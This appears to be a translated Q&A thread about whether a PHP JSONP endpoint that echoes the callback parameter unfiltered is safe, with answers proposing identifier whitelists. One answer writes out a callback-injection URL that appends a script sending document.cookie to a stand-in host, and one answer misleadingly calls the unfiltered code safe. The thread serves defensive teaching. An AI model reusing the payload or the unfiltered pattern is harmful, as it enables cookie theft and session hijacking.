Это безопасно для обеспечения JSONP? - PullRequest
Новая
       3

Это безопасно для обеспечения JSONP?

23 голосов
/ 27 июня 2010 
<?php header('content-type: application/json');

$json = json_encode($data);

echo isset($_GET['callback'])
    ? "{$_GET['callback']}($json)"
    : $json;

Или я должен, например, отфильтровать переменную $_GET['callback'], чтобы она содержала только допустимое имя функции JavaScript? Если да, то каковы действительные имена функций JavaScript?

Или не фильтрует эту переменную с JSONP?

Текущее решение: Блог о моем текущем решении на http://www.geekality.net/?p=1021. Короче говоря, сейчас у меня есть следующий код, который, надеюсь, должен быть довольно безопасным: 

<?php header('content-type: application/json; charset=utf-8');

function is_valid_callback($subject)
{
     $identifier_syntax
       = '/^[$_\p{L}][$_\p{L}\p{Mn}\p{Mc}\p{Nd}\p{Pc}\x{200C}\x{200D}]*+$/u';

     $reserved_words = array('break', 'do', 'instanceof', 'typeof', 'case',
       'else', 'new', 'var', 'catch', 'finally', 'return', 'void', 'continue', 
       'for', 'switch', 'while', 'debugger', 'function', 'this', 'with', 
       'default', 'if', 'throw', 'delete', 'in', 'try', 'class', 'enum', 
       'extends', 'super', 'const', 'export', 'import', 'implements', 'let', 
       'private', 'public', 'yield', 'interface', 'package', 'protected', 
       'static', 'null', 'true', 'false');

     return preg_match($identifier_syntax, $subject)
         && ! in_array(mb_strtolower($subject, 'UTF-8'), $reserved_words);
}

$data = array(1, 2, 3, 4, 5, 6, 7, 8, 9);
$json = json_encode($data);

# JSON if no callback
if( ! isset($_GET['callback']))
     exit( $json );

# JSONP if valid callback
if(is_valid_callback($_GET['callback']))
     exit( "{$_GET['callback']}($json)" );

# Otherwise, bad request
header('Status: 400 Bad Request', true, 400);

Ответы [ 3 ]

17 голосов
/ 28 июня 2010

Нет, если вы намерены ограничить JSONP для выбора доменов.Укажите также кодировку, или люди, которые не должны иметь доступа к JSON, могут проводить атаки с использованием инъекций UTF-7.Вместо этого используйте этот заголовок: 

header('Content-Type: application/json; charset=utf-8');

Если предполагается, что это публичная служба JSONP, тогда да, это безопасно, а также используйте application/javascript вместо application/json.

9 голосов
/ 01 августа 2011

Чтобы быть в безопасности, вы должны закодировать callback, чтобы разрешить только допустимые имена функций JS.Ничего сложного, только не позволяйте конечным разработчикам вставлять любой javascript.Вот некоторый код: 

<?php

    header('Content-Type: application/json; charset=utf-8'); // Thanks Eli

    /**
     * Ensures that input string matches a set of whitelisted characters and
     * replaces unlisted ones with a replacement string (defaults to underscore).
     * @param string $orig The original text to filter.
     * @param string $replace The replacement string (default is underscore).
     * @param string The original text with bad characters replaced with $replace.
     * @link https://github.com/uuf6429/K2F/blob/master/K2F-DEV/core/security.php#L263
     */
    function strtoident($orig,$replace=''){
        $orig=(string)$orig;                  // ensure input is a string
        for($i=0; $i<strlen($orig); $i++){
            $o=ord($orig{$i});
            if(!(  (($o>=48) && ($o<=57))     // numbers
                || (($o>=97) && ($o<=122))    // lowercase
                || (($o>=65) && ($o<=90))     // uppercase
                || ($orig{$i}=='_')))         // underscore
                   $orig{$i}=$replace;        // check failed, use replacement
        }
        return $orig;
    }

    $json=json_encode($data)

    echo isset($_GET['callback'])
        ? strtoident($_GET['callback']).'('.$json.');'
        : $json;

?>

Редактировать:

Причина в том, чтобы хакеры не указывали невинным жертвам на: 

http://yoursite.com/jsonp.php?callback=(function(){ $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'); })//

Что может бытьс разбивкой на: 

(function(){
    $(document.body).append(
        '<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'
    );
})//("whatever");

Поскольку последняя часть представляет собой json, который вы закодировали, легко удаляется с комментарием (хотя он и не нужен для их работы).По сути, хакер узнает файлы cookie пользователя (помимо прочего), которые помогают ему получить доступ к учетной записи пользователя на вашем веб-сайте.

Редактировать: Совместимость с UTF-8.Для обоснования моих утверждений прочитайте здесь .Или:

Как и UTF-16 и UTF-32, UTF-8 может представлять каждый символ в наборе символов Unicode.В отличие от них, он обратно совместим с ASCII и позволяет избежать осложнений порядка байтов и порядка следования байтов (BOM).

2 голосов
/ 27 июня 2010

Я думаю, что это безопасно. Пока вы не отображаете $ _GET ['callback'] на другой странице без экранирования. Тот, кто делает запрос, может поместить в него все, что захочет, я думаю, это всегда будут его проблемы, а не ваши На этой странице приведено определение действительного имени функции js: http://www.functionx.com/javascript/Lesson05.htm

...